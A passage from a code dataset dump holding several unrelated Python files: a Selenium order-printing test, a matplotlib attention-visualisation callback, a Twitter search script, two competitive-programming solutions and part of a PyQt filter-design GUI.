args=(p.id,)))","repo_name":"drexly/tonginGAE","sub_path":"dosirak/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10894024515","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n#Author: rufeng\n\nimport unittest\nimport time\nfrom framework.browser_engine import BrowserEngine\nfrom framework.logger import Logger\nfrom pageobjects.login_page import Loginpage\nfrom pageobjects.order_create_page import Ordercreate\nfrom pageobjects.order_page import OrderPage\n\nclass Printsend(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        \"\"\"\n        Fixture setUp() code: the preparation work required before the test runs\n        :return:\n        \"\"\"\n        browser = BrowserEngine(cls)\n        cls.driver = browser.open_browser(cls)\n\n    @classmethod\n    def tearDownClass(cls):\n        \"\"\"\n        Clean-up after the test finishes; here that basically means closing the browser\n        :return:\n        \"\"\"\n        cls.driver.quit()\n\n\n\n\n\n    def test_print_and_send(self):\n\n        # Parameters ----------------------------------\n        address = '张放1'\n        tem = '顺丰热敏180mm'\n        # ----------------------------------------------\n        logger = Logger(logger=\"BasePage\").getlog()\n        # Initialize the login page and log in\n        loginpage = Loginpage(self.driver)\n        loginpage.type_username('12830222909')\n        loginpage.type_password('1qaz2wsx')\n        self.driver.find_element_by_id('submit').click()\n\n        time.sleep(3)\n        # Work on one specific order\n\n        # Switch to the current frame\n        frame1 = self.driver.find_element_by_id('container-i')\n        self.driver.switch_to_frame(frame1)\n        time.sleep(3)\n\n        # Instantiate the page object\n        orderpage = OrderPage(self.driver)\n\n        # Select the order by the given recipient address\n        self.driver.find_element_by_xpath('//td[text()=\"%s\"]'%address).click()\n        # Click to print the shipping label\n        orderpage.click_print()\n        time.sleep(1)\n        # Choose the template\n        self.driver.find_element_by_xpath('//label[text()=\"%s\"]'%tem).click()\n        # Choose the printer\n        orderpage.choose_printer('Microsoft XPS Document Writer')\n        # Click print\n        orderpage.click_print1()\n        time.sleep(1)\n        # Confirm printing\n        orderpage.yes_print()\n        time.sleep(4)\n        # Verify the print result --------------------------------------------------------------------------------------------------\n        row1 = orderpage.element_row('张放1')\n        x = '//*[@id=\"tableDiv\"]/table/tbody[2]/tr[%s]/td[1]/i'%row1 # printed-flag icon\n        try:\n            if orderpage.is_element_exist(x):\n                self.assertTrue(True)\n                logger.info('Print succeeded')\n            else:\n                self.assertTrue(False)\n        except BaseException as e:\n            self.assertTrue(False)\n        # --------------------------------------------------------------------------------------------------------------\n        orderpage.click_consignBtn()\n        time.sleep(3)\n        # Verify that the consignment summary is correct --------------------------------------------------------------------------\n        info1 = orderpage.get_consignment_info()\n        print(info1)\n        try:\n            if info1 == '发货合计:共1单':\n                self.assertTrue(True)\n                logger.info('Selected one order for consignment')\n            else:\n                orderpage.get_windows_img()\n                self.assertTrue(False)\n        except BaseException as e:\n            self.assertTrue(False)\n        time.sleep(2)\n        # Click OK\n        orderpage.click_qdConsign()\n        time.sleep(4)\n        # Verify the consignment result\n        info2 = orderpage.get_consignResult_info()\n        try:\n            if info2 == '共1单,成功1单,失败0单':\n                self.assertTrue(True)\n                logger.info('One order consigned successfully')\n            else:\n                orderpage.get_windows_img()\n                self.assertTrue(False)\n        except BaseException as e:\n            self.assertTrue(False)\n\n        # Close the consignment dialog\n        orderpage.click_confirm_close()\n        time.sleep(2)\n        # Leave the frame\n        self.driver.switch_to.default_content()\n        # Log out\n        loginpage.skin01_logout()\n        time.sleep(3)\n\nif __name__=='__main__':\n
unittest.main()\n","repo_name":"Rufengfree/ECS","sub_path":"testsuits/printandsend.py","file_name":"printandsend.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10894495188","text":"from pathlib import Path\nfrom typing import Any, Literal\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nfrom matplotlib import cm\nfrom pytorch_lightning.callbacks import Callback\nfrom transformers import PreTrainedTokenizer\n\nfrom memory_re.data.datasets.entities import EntityType, RelationType, TokenizedDocument\nfrom memory_re.utils.logger import get_logger\n\nLOGGER = get_logger(__name__)\nmatplotlib.use('Agg')\n\n\nclass MemoryAttentionTrackingCallback(Callback):\n def __init__(\n self,\n stage: str,\n save_dir: str | Path,\n memory_level: Literal['tokens', 'mentions'],\n memory_type: Literal['relations', 'entities'],\n entity_labels: dict[str, EntityType],\n relation_types: dict[str, RelationType],\n tokenizer: PreTrainedTokenizer,\n all_types: bool = False,\n document_ids: list[int] | None = None,\n ):\n self._stage = stage\n self._memory_level = memory_level\n self._memory_type = memory_type\n self._save_dir = Path(save_dir)\n self._entity_labels = entity_labels\n self._all_types = all_types\n self._relation_types = relation_types\n self._document_ids = document_ids\n self._tokenizer = tokenizer\n self._examples_to_store: list[int] = []\n self._save_dir.mkdir(parents=True, exist_ok=True)\n\n def on_test_batch_end( # type: ignore[override]\n self,\n trainer: \"pl.Trainer\",\n pl_module: \"pl.LightningModule\",\n outputs: dict[str, Any] | None,\n batch: Any,\n batch_idx: int,\n dataloader_idx: int,\n ) -> None:\n if self._stage == 'test' and outputs is not None:\n doc_ids = batch['doc_ids']\n memory_modules_attentions = outputs['memory_modules_attentions']\n memory_attentions = memory_modules_attentions[f'{self._memory_level}_flow']\n entity_memory_attentions = memory_attentions['entity'].cpu().detach()\n relation_memory_attentions = memory_attentions['relation'].cpu().detach()\n\n docs = trainer.datamodule.test_dataset.documents # type: ignore\n for batch_idx in range(doc_ids.shape[0]):\n doc_id = doc_ids[batch_idx].detach().cpu().item()\n valid_mentions = outputs['pos_valid_mentions'][batch_idx].detach().cpu()\n valid_mentions_masks = (\n [outputs['pos_valid_mentions_masks']][batch_idx].detach().cpu()\n )\n valid_mentions = valid_mentions[valid_mentions_masks.bool().squeeze()]\n mention_spans = batch['mention_orig_spans'].detach().cpu()\n\n if self._document_ids and doc_id not in self._document_ids:\n continue\n\n labels_dict: dict = (\n self._entity_labels\n if self._memory_type == 'entities'\n else self._relation_types # type: ignore\n )\n attentions = (\n entity_memory_attentions\n if self._memory_type == 'entities'\n else relation_memory_attentions\n )\n labels = [label.short_name for label in labels_dict.values()]\n\n if self._memory_level == 'mentions':\n self.visualize_mentions(\n doc_id,\n mention_spans=mention_spans[batch_idx],\n document=docs[doc_id],\n labels=labels,\n valid_mentions=valid_mentions,\n memory_attention=attentions[batch_idx],\n save_dir=self._save_dir,\n )\n else:\n self.visualize_tokens(\n doc_id,\n document=docs[doc_id],\n labels=labels,\n memory_attention=attentions[batch_idx],\n save_dir=self._save_dir,\n )\n\n def visualize_mentions(\n self,\n doc_id: int,\n mention_spans: torch.Tensor,\n 
valid_mentions: torch.Tensor,\n document: TokenizedDocument,\n labels: list[str],\n memory_attention: torch.Tensor,\n save_dir: Path,\n ) -> None:\n valid_mention_spans = mention_spans[valid_mentions].detach().cpu()\n valid_mention_memory_attention = memory_attention[valid_mentions]\n other_mentions_mask = torch.ones(mention_spans.shape[0], dtype=torch.bool)\n other_mentions_mask[valid_mentions] = False\n other_mentions_memory_attention = memory_attention[other_mentions_mask]\n\n n_plots = 3 + len(labels) if self._all_types else 2\n fig, axs = plt.subplots(\n n_plots,\n 2,\n figsize=(valid_mention_spans.shape[0], 12 if self._all_types else 4),\n sharey='row',\n sharex='col',\n gridspec_kw={\n 'width_ratios': [4, 1],\n 'height_ratios': [2] + [1] * ((2 + len(labels)) if self._all_types else 1),\n },\n )\n\n axs[1, 0].set_ylabel('Sum')\n color = cm.rainbow(np.linspace(0, 1, len(labels)))\n\n if self._all_types:\n for i, label in enumerate(labels):\n axs[n_plots - 1 - i, 0].set_ylabel(label, color=color[i])\n axs[2, 0].set_ylabel('Ratio')\n\n x = range(valid_mention_spans.shape[0])\n\n for _, _axs in enumerate(axs):\n for ax in _axs:\n ax.set_ylim(0, 1)\n ax.get_xaxis().set_visible(False)\n\n y_s = []\n axs[0, 0].set_xticks(x)\n axs[0, 0].axis('off')\n axs[0, 0].set_ylim(0, 0.2)\n\n for i in range(valid_mention_spans.shape[0]):\n mention_span = valid_mention_spans[i]\n phrase = ' '.join(\n t.phrase for t in document.tokens[mention_span[0] : mention_span[1]] # type: ignore\n )\n\n mention_memory_attentions = valid_mention_memory_attention[i, :]\n\n axs[0, 0].text(\n i,\n 0.05,\n phrase,\n rotation=90,\n fontsize=18,\n verticalalignment='bottom',\n horizontalalignment='center',\n )\n y_s.append(mention_memory_attentions)\n\n y = np.vstack(y_s).transpose()\n y_stacked = np.zeros_like(y[0])\n y_sum = np.sum(y, axis=0)\n axs[1, 0].bar(x, y_sum, color='b')\n axs[1, 0].set_ylim(0, np.max(y_sum) * 1.1)\n\n if self._all_types:\n for j in range(y.shape[0]):\n axs[n_plots - 1 - j, 0].bar(x, y[j], color=color[j])\n axs[2, 0].bar(x, y[j] / y_sum, bottom=y_stacked / y_sum, color=color[j])\n y_stacked += y[j]\n\n x = range(3)\n axs[0, 1].set_xticks(x)\n axs[0, 1].axis('off')\n\n y_s = []\n\n for i, (phrase, values) in enumerate(\n (\n ('max', other_mentions_memory_attention.sum(dim=1).max()),\n ('mean', other_mentions_memory_attention.sum(dim=1).mean()),\n ('min', other_mentions_memory_attention.sum(dim=1).min()),\n )\n ):\n axs[0, 1].text(\n i,\n 0.05,\n f'Others ({phrase})',\n rotation=90,\n fontsize=18,\n verticalalignment='bottom',\n horizontalalignment='center',\n )\n\n y_s.append(values)\n\n y = np.vstack(y_s).transpose()\n y_sum = np.sum(y, axis=0)\n axs[1, 1].bar(x, y_sum, color='b')\n\n plt.tight_layout()\n plt.savefig(Path(save_dir) / f'{doc_id}.jpg', dpi=200)\n\n def visualize_tokens( # noqa\n self,\n doc_id: int,\n document: TokenizedDocument,\n labels: list[str],\n memory_attention: torch.Tensor,\n save_dir: Path,\n ) -> None:\n width_ratios = [len(sentence.tokens) for sentence in document.sentences]\n n_plots = 3 + len(labels) if self._all_types else 2\n fig, axs = plt.subplots(\n n_plots,\n len(document.sentences),\n figsize=(int(0.7 * len(document.tokens)), 12 if self._all_types else 6),\n sharey='row',\n sharex='col',\n gridspec_kw={\n 'width_ratios': width_ratios,\n 'height_ratios': [4] + [1] * ((2 + len(labels)) if self._all_types else 1),\n },\n )\n\n axs[1, 0].set_ylabel('Sum')\n color = cm.rainbow(np.linspace(0, 1, len(labels)))\n\n if self._all_types:\n for i, label in 
enumerate(labels):\n                axs[n_plots - 1 - i, 0].set_ylabel(label, color=color[i])\n            axs[2, 0].set_ylabel('Ratio')\n\n        for i, _axs in enumerate(axs):\n            if i > 0:\n                for ax in _axs:\n                    ax.set_ylim(0, 1)\n                    ax.get_xaxis().set_visible(False)\n\n        y_sum_max = 0\n\n        for i, sentence in enumerate(document.sentences):\n            x = range(len(sentence.tokens))\n            axs[0, i].set_xticks(x)\n            axs[0, i].axis('off')\n            axs[0, i].set_ylim(0, 0.2)\n\n            y_s = []\n\n            for j, token in enumerate(sentence.tokens):\n                token_memory_attentions = memory_attention[token.span_start : token.span_end, :]\n                token_memory_attentions = token_memory_attentions.sum(dim=0)\n\n                axs[0, i].text(\n                    j,\n                    0.05,\n                    token.phrase,\n                    rotation=90,\n                    fontsize=18,\n                    verticalalignment='bottom',\n                    horizontalalignment='center',\n                )\n                y_s.append(token_memory_attentions)\n\n            y = np.vstack(y_s).transpose()\n            y_stacked = np.zeros_like(y[0])\n            y_sum = np.sum(y, axis=0)\n            local_y_sum_max = np.max(y_sum)\n\n            if local_y_sum_max > y_sum_max:\n                y_sum_max = local_y_sum_max\n\n            axs[1, i].bar(x, y_sum, color='b')\n\n            if self._all_types:\n                for j in range(y.shape[0]):\n                    axs[n_plots - 1 - j, i].bar(x, y[j], color=color[j])\n                    axs[2, i].bar(x, y[j] / y_sum, bottom=y_stacked / y_sum, color=color[j])\n                    y_stacked += y[j]\n\n        axs[1, 0].set_ylim(0, y_sum_max)\n\n        plt.tight_layout()\n        plt.savefig(Path(save_dir) / f'{doc_id}.jpg', dpi=200)\n","repo_name":"kosciukiewicz/similarity_based_memory_re","sub_path":"memory_re/utils/callbacks/memory_attention_tracking.py","file_name":"memory_attention_tracking.py","file_ext":"py","file_size_in_byte":10610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"2933644631","text":"#!/usr/bin/python\n\nimport twitter\nimport pickle\nimport time\n\n\n\n# Twitter API keys go here\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\n\nOAUTH_TOKEN = ''\nOAUTH_TOKEN_SECRET = ''\n\nauth = twitter.oauth.OAuth(OAUTH_TOKEN, OAUTH_TOKEN_SECRET,\n                           CONSUMER_KEY, CONSUMER_SECRET)\n\ntwitter_api = twitter.Twitter(auth=auth)\n\nq = 'prayfor' \ncount = 30\n'''\ntweet_texts = []\ntweet_mentions = []\ntweet_hashtags = []\ntweet_bios = []\n'''\nsearch_results = twitter_api.search.tweets(q=q, count=count)\nstatuses = search_results['statuses']\n\n'''\n# save relevant data\ntweet_texts += [status['text'] for status in statuses]\ntweet_mentions += [mention['screen_name'] for status in statuses\n                   for mention in status['entities']['user_mentions']]\ntweet_hashtags += [hashtag['text'] for status in statuses\n                   for hashtag in status['entities']['hashtags']]\ntweet_bios += [status['user']['description'] for status in statuses \n               if status['user']['description']]\n'''\n\ncurrent_time = time.asctime(time.localtime(time.time()))\nfor ch in [' ',':']:\n\tif ch in current_time:\n\t\tcurrent_time = current_time.replace(ch,'_')\n\npath = '/Users/Jiwon/Desktop/socialdataanalysis/final/'\npickle.dump(statuses, open(path+'%s_%s.p' % (q,current_time),'wb'))\n\n\n\n\n","repo_name":"jwnyoon/PrayFor","sub_path":"pickled.py","file_name":"pickled.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9277565853","text":"#\n# @lc app=leetcode.cn id=189 lang=python3\n#\n# [189] Rotate Array\n#\n\n# @lc code=start\nfrom typing import List\n\nclass Solution:\n    # Three reversals are enough: reverse the whole array, then each part around index k\n    def rotate(self, nums: List[int], k: int) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        k %= len(nums)\n
        self.reverse(nums, 0, len(nums)-1)\n        self.reverse(nums, 0, k-1)\n        self.reverse(nums, k, len(nums)-1)\n        return \n\n\n    def reverse(self, nums, start, end):\n        while start < end:\n            nums[start], nums[end] = nums[end], nums[start]\n            start += 1\n            end -= 1\n        return\n# @lc code=end\n\n","repo_name":"purecall/my_leetcode","sub_path":"189 旋转数组.py","file_name":"189 旋转数组.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18322545681","text":"import sys\nfrom itertools import product\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n    N = NI()\n    for p in product(\"abc\", repeat=N):\n        print(\"\".join(p))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC029/ABC029C.py","file_name":"ABC029C.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36651853294","text":"# PyQt5 modules\nfrom math import inf\nfrom PyQt5.QtWidgets import QMainWindow, QListWidgetItem, QColorDialog, QFileDialog, QDialog, QStyle, QApplication, QPlainTextEdit\nfrom PyQt5.QtCore import Qt\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n\n# Project modules\nfrom src.ui.mainwindow import Ui_MainWindow\nfrom src.lineDialog import lineDialog\nfrom src.package.Dataset import Dataset\nimport src.package.Filter as Filter\nfrom src.package.Filter import AnalogFilter\nfrom src.widgets.exprwidget import MplCanvas\nfrom src.widgets.tf_dialog import TFDialog\nfrom src.widgets.case_window import CaseDialog\nfrom src.widgets.zp_window import ZPWindow\nfrom src.widgets.response_dialog import ResponseDialog\nfrom src.widgets.prompt_dialog import PromptDialog\nfrom src.widgets.textDialog import TextDialog\n\nfrom scipy.signal import savgol_filter\nimport scipy.signal as signal\nfrom scipy.interpolate import splrep, splev, splprep\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom mplcursors import HoverMode, cursor, Selection\nfrom matplotlib.patches import Rectangle\n\nimport numpy as np\nimport random\nfrom pyparsing.exceptions import ParseSyntaxException\n\nimport pickle\n\nMARKER_STYLES = { 'None': '', 'Point': '.', 'Pixel': ',', 'Circle': 'o', 'Triangle down': 'v', 'Triangle up': '^', 'Triangle left': '<', 'Triangle right': '>', 'Tri down': '1', 'Tri up': '2', 'Tri left': '3', 'Tri right': '4', 'Octagon': '8', 'Square': 's', 'Pentagon': 'p', 'Plus (filled)': 'P', 'Star': '*', 'Hexagon': 'h', 'Hexagon alt.': 'H', 'Plus': '+', 'x': 'x', 'x (filled)': 'X', 'Diamond': 'D', 'Diamond (thin)': 'd', 'Vline': '|', 'Hline': '_' }\nLINE_STYLES = { 'None': '', 'Solid': '-', 'Dashed': '--', 'Dash-dot': '-.', 'Dotted': ':' }\n\nPOLE_COLOR = '#FF0000'\nPOLE_SEL_COLOR = '#00FF00'\nZERO_COLOR = '#0000FF'\nZERO_SEL_COLOR = '#00FF00'\n\nTEMPLATE_FACE_COLOR = '#ffcccb'\nTEMPLATE_EDGE_COLOR = '#ef9a9a'\nADD_TEMPLATE_FACE_COLOR = '#c8e6c9'\nADD_TEMPLATE_EDGE_COLOR = '#a5d6a7'\n\nSHOW_PZ_IN_HZ = True\nPZ_XLABEL = f'$\\sigma$ [1/s]' if SHOW_PZ_IN_HZ else '$\\sigma$ ($rad/s$)'\nPZ_YLABEL = f'$jf$ [Hz]' if SHOW_PZ_IN_HZ else '$j\\omega$ ($rad/s$)'\nF_TO_W = 2*np.pi\nW_TO_F = 1/F_TO_W\nSING_B_TO_F = W_TO_F if SHOW_PZ_IN_HZ else 1
\nSING_F_TO_B = F_TO_W if SHOW_PZ_IN_HZ else 1\n\ndef stage_to_str(stage):\n    stage_str = 'Z={'\n    for z in stage.z:\n        stage_str += str(z)\n        stage_str += ', '\n    stage_str += '} , P={'\n    for p in stage.p:\n        stage_str += str(p)\n        stage_str += ', '\n    stage_str += '} , K='\n    stage_str += str(stage.k)\n    return stage_str\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n\n    def __init__(self):\n        super(MainWindow, self).__init__()\n        self.setupUi(self)\n        self.droppedFiles = []\n        self.datasets = []\n        self.datalines = []\n        # self.stage_datasets = []  # maybe later I'll add this so the stages get serialized too, but I think that's too much for now\n        self.selected_dataset_widget = {}\n        self.selected_dataline_widget = {}\n        self.selected_dataset_data = {}\n        self.selected_dataline_data = {}\n        self.zpWindow = type('ZPWindow', (), {})()\n\n        self.dl_type_flag = 0\n        \n        self.import_file_btn.clicked.connect(self.importFiles)\n        \n        self.dataset_list.currentItemChanged.connect(self.populateSelectedDatasetDetails)\n        self.ds_title_edit.textEdited.connect(self.updateSelectedDatasetName)\n        self.ds_addline_btn.clicked.connect(self.addDataline)\n        self.ds_remove_btn.clicked.connect(self.removeSelectedDataset)\n        self.ds_poleszeros_btn.clicked.connect(self.showZPWindow)\n\n        self.dataline_list.currentItemChanged.connect(self.populateSelectedDatalineDetails)\n        self.dl_name_edit.textEdited.connect(self.updateSelectedDataline)\n        self.dl_render_cb.activated.connect(self.updateSelectedDataline)\n        self.dl_transform_cb.activated.connect(self.updateSelectedDataline)\n        self.dl_xdata_cb.activated.connect(self.updateSelectedDataline)\n        self.dl_xscale_sb.valueChanged.connect(self.updateSelectedDataline)\n        self.dl_xoffset_sb.valueChanged.connect(self.updateSelectedDataline)\n        self.dl_ydata_cb.activated.connect(self.updateSelectedDataline)\n        self.dl_yscale_sb.valueChanged.connect(self.updateSelectedDataline)\n        self.dl_yoffset_sb.valueChanged.connect(self.updateSelectedDataline)\n        self.dl_color_edit.textEdited.connect(self.updateSelectedDataline)\n        self.dl_style_cb.activated.connect(self.updateSelectedDataline)\n        self.dl_linewidth_sb.valueChanged.connect(self.updateSelectedDataline)\n        self.dl_marker_cb.activated.connect(self.updateSelectedDataline)\n        self.dl_markersize_sb.valueChanged.connect(self.updateSelectedDataline)\n        self.dl_remove_btn.clicked.connect(self.removeSelectedDataline)\n        self.dl_savgol_wlen.valueChanged.connect(self.updateSelectedDataline)\n        self.dl_savgol_ord.valueChanged.connect(self.updateSelectedDataline)\n\n        self.dl_color_pickerbtn.clicked.connect(self.openColorPicker)\n\n        \n        #Add a line or a point to graph.\n        self.ld = lineDialog(self)\n        self.addLineOrPoint.clicked.connect(self.showlineGeneratorWidget)\n        self.ld.createButton.clicked.connect(self.resolveLineDialog)\n        self.ld.createPointButton.clicked.connect(self.resolvePointDialog)\n        \n        #Draw points by hand.
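\n        # The two connects below toggle click-to-draw mode; the drawing itself happens\n        # in the on_mpl_widget_clicked* handlers that get hooked to each canvas.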
\n self.drawPointButton.clicked.connect(self.resolveDrawPointButton)\n self.drawLineButton.clicked.connect(self.resolveDrawLineButton)\n self.event_detection_enabled = False\n self.event_detection_enabled_line = 0\n \n #Add text\n self.textDialog = TextDialog(self)\n self.addText.clicked.connect(self.showTextWidget)\n self.textDialog.updateButton.clicked.connect(self.updateTexts)\n self.textDialog.removeButton.clicked.connect(self.removeText)\n self.textDialog.pickColorButton.clicked.connect(self.openColorPickerText)\n self.textDialog.textList.itemClicked.connect(self.updateTextDialog)\n self.textDialog.closeButton.clicked.connect(self.closeTextDialog)\n\n self.respd = ResponseDialog()\n self.resp_btn.clicked.connect(self.openResponseDialog)\n self.respd.accepted.connect(self.resolveResponseDialog)\n\n self.tfd = TFDialog()\n self.function_btn.clicked.connect(self.openTFDialog)\n self.tfd.accepted_tf.clicked.connect(self.resolveTFDialog)\n self.tfd.accepted_f.clicked.connect(self.resolveFDialog)\n\n self.csd = CaseDialog()\n self.ds_caseadd_btn.clicked.connect(self.openCaseDialog)\n self.csd.accepted.connect(self.resolveCSDialog)\n\n self.pmptd = PromptDialog()\n \n self.plt_labelsize_sb.valueChanged.connect(self.updatePlots)\n self.plt_legendsize_sb.valueChanged.connect(self.updatePlots)\n self.plt_ticksize_sb.valueChanged.connect(self.updatePlots)\n self.plt_titlesize_sb.valueChanged.connect(self.updatePlots)\n self.plt_autoscale.clicked.connect(self.autoscalePlots)\n self.plt_legendpos.activated.connect(self.updatePlots)\n self.plt_grid.stateChanged.connect(self.updatePlots)\n self.tabbing_plots.currentChanged.connect(self.updatePlots)\n \n self.plots_canvases = [\n [ self.plot_1 ],\n [ self.plot_2_1, self.plot_2_2 ],\n [ self.plot_3 ],\n [ self.plot_4_1, self.plot_4_2 ],\n [ self.plot_5 ],\n ]\n\n self.new_filter_btn.clicked.connect(self.addFilter)\n self.chg_filter_btn.clicked.connect(self.changeSelectedFilter)\n self.tipo_box.currentIndexChanged.connect(self.updateFilterParametersAvailable)\n self.define_with_box.currentIndexChanged.connect(self.updateFilterParametersAvailable)\n self.updateFilterParametersAvailable()\n\n self.new_stage_btn.clicked.connect(self.addFilterStage)\n self.remove_stage_btn.clicked.connect(self.removeFilterStage)\n\n self.actionLoad_2.triggered.connect(self.loadFile)\n self.actionSave_2.triggered.connect(self.saveFile)\n\n self.stageCursorZer = {}\n self.stageCursorPol = {}\n\n self.poles_list.itemSelectionChanged.connect(self.stage_sel_changed)\n self.zeros_list.itemSelectionChanged.connect(self.stage_sel_changed)\n self.stages_list.itemSelectionChanged.connect(self.updateStagePlots)\n\n self.filters = []\n self.selfil_cb.currentIndexChanged.connect(self.populateSelectedFilterDetails)\n self.stages_selfil_cb.currentIndexChanged.connect(self.populateSelectedFilterDetails)\n self.symmetrize_btn.clicked.connect(self.makeFilterTemplateSymmetric)\n\n self.sswapup_btn.setIcon(self.style().standardIcon(QStyle.SP_TitleBarShadeButton))\n self.sswapdown_btn.setIcon(self.style().standardIcon(QStyle.SP_TitleBarUnshadeButton))\n self.sswapup_btn.clicked.connect(self.swapStagesUpwards)\n self.sswapdown_btn.clicked.connect(self.swapStagesDownwards)\n self.autoselectstagessp_btn.clicked.connect(self.orderStagesBySos)\n\n self.prevFilterType = Filter.LOW_PASS\n self.compareapprox_cb.setCurrentIndexes([])\n \n self.pointCount = 0\n self.lineCount = 0\n\n def showTextWidget(self):\n if self.textDialog:\n self.textDialog.show()\n else:\n self.ld = TextDialog(self)\n\n\n def 
showlineGeneratorWidget(self):\n        if self.ld:\n            self.ld.show()\n        else:\n            self.ld = lineDialog(self)\n\n    def resolveLineDialog(self):\n        # Detect info to add a line to graph.\n        self.ld.setLine()\n        ds = Dataset(filepath='', origin=self.ld.l, title=self.ld.getTitle() + \".line\")\n        self.addDataset(ds)\n    \n    def resolvePointDialog(self):\n        # Detect info to add a point to graph.\n        self.ld.setPoint()\n        ds = Dataset(filepath='', origin=self.ld.p, title=self.ld.getTitle() + \".pt\")\n        self.addDataset(ds)\n    \n    \n    # Click event on canvas handler for drawing points.\n    def on_mpl_widget_clicked(self, event):\n        if not self.event_detection_enabled:\n            return\n        \n        if event.button == 1: # Verifies that the left mouse button has been clicked\n            x = event.xdata \n            y = event.ydata\n            \n            self.drawPoint(x,y)\n            \n            self.addDataline()\n            \n            self.event_detection_enabled = False\n            self.setCursor(Qt.ArrowCursor)\n    \n    \n    # Click event on canvas handler for drawing lines\n    def on_mpl_widget_clicked_line(self, event):\n        if self.event_detection_enabled_line == 0:\n            return\n        \n        if event.button == 1 and self.event_detection_enabled_line == 2:\n            x = event.xdata \n            y = event.ydata\n            self.ld.secondPointX.setValue(x)\n            self.ld.seconPointY.setValue(y)\n            self.event_detection_enabled_line = 0\n            \n            self.drawLine()\n            \n            self.addDataline()\n            \n            self.setCursor(Qt.ArrowCursor)\n        \n        if event.button == 1 and self.event_detection_enabled_line == 1: # Verifies that the left mouse button has been clicked\n            x = event.xdata \n            y = event.ydata\n            self.ld.firstPointX.setValue(x)\n            self.ld.firstPointY.setValue(y)\n            self.event_detection_enabled_line = 2\n    \n    \n    \n    #Allows and disallows canvases to be clicked to draw points.\n    def resolveDrawPointButton(self):\n        if self.event_detection_enabled == False:\n            for canvas_group in self.plots_canvases:\n                for canvas in canvas_group:\n                    canvas.canvas.mpl_connect('button_press_event', self.on_mpl_widget_clicked)\n            self.setCursor(Qt.CrossCursor)\n            \n            self.event_detection_enabled = True\n    \n    #Allows and disallows canvases to be clicked to draw lines.\n    def resolveDrawLineButton(self):\n        if self.event_detection_enabled_line == 0:\n            for canvas_group in self.plots_canvases:\n                for canvas in canvas_group:\n                    canvas.canvas.mpl_connect('button_press_event', self.on_mpl_widget_clicked_line)\n            self.setCursor(Qt.CrossCursor)\n            self.event_detection_enabled_line = 1\n    \n    #Function used to draw a point by clicking on canvas\n    def drawPoint(self, x, y):\n        #Changes the lineGenerator dialog as if you were drawing a point from there\n        self.ld.pointX.setValue(x)\n        self.ld.pointY.setValue(y)\n        self.ld.setPoint()\n        ds = Dataset(filepath='', origin=self.ld.p, title= \"Point\" + str(self.pointCount))\n        self.pointCount += 1\n        self.addDataset(ds)\n    \n    def drawLine(self):\n        #Changes the lineGenerator dialog as if you were drawing a line from there\n        self.ld.setLine()\n        ds = Dataset(filepath='', origin=self.ld.l, title= \"Line\" + str(self.lineCount))\n        self.lineCount += 1\n        self.addDataset(ds)\n    \n    def addDataset(self, ds):\n        qlwt = QListWidgetItem()\n        qlwt.setData(Qt.UserRole, ds)\n        qlwt.setText(ds.title)\n        self.dataset_list.addItem(qlwt)\n        self.datasets.append(ds)\n        self.datalines.append([])\n        self.dataset_list.setCurrentRow(self.dataset_list.count() - 1)\n\n    def removeDataset(self, i):\n        # Remove this dataset's datalines first\n        first_dataline_index = 0\n        last_dataline_index = len(self.datalines[0])\n        for x in range(self.dataset_list.count()):\n            if(x == 0):\n                first_dataline_index = 0\n            else: \n                first_dataline_index += 
len(self.datalines[x - 1])\n if(x == i):\n break\n last_dataline_index = first_dataline_index + len(self.datalines[i])\n\n for x in range(first_dataline_index, last_dataline_index):\n self.dataline_list.takeItem(first_dataline_index)\n self.datalines.pop(i)\n\n ds = self.dataset_list.item(i).data(Qt.UserRole)\n if(ds.type == 'filter'):\n fi = self.filters.index(ds)\n self.filters.pop(fi)\n self.selfil_cb.removeItem(fi)\n self.stages_selfil_cb.removeItem(fi)\n if(self.selfil_cb.count() == 0):\n self.chg_filter_btn.setEnabled(False)\n self.dataset_list.takeItem(i)\n self.updatePlots()\n\n def addDataline(self):\n if(not self.selected_dataset_data):\n return\n dl = self.selected_dataset_data.create_dataline()\n qlwt = QListWidgetItem()\n qlwt.setData(Qt.UserRole, dl)\n qlwt.setText(dl.name)\n dli = 0\n for x in range(self.dataset_list.count()):\n ds = self.dataset_list.item(x).data(Qt.UserRole)\n dli += len(self.datalines[x])\n if(ds.origin == self.selected_dataset_data.origin):\n break\n self.dataline_list.insertItem(dli, qlwt)\n self.dataline_list.setCurrentRow(dli)\n self.datalines[self.dataset_list.currentRow()].append(dl)\n self.updateSelectedDataline()\n self.updatePlots()\n\n def removeDataline(self, i): \n try:\n dsi, dli = self.getInternalDataIndexes(i)\n del self.datalines[dsi][dli]\n self.dataline_list.takeItem(i).data(Qt.UserRole)\n del self.dataset_list.item(dsi).data(Qt.UserRole).datalines[dli]\n if(self.dataline_list.currentRow() == 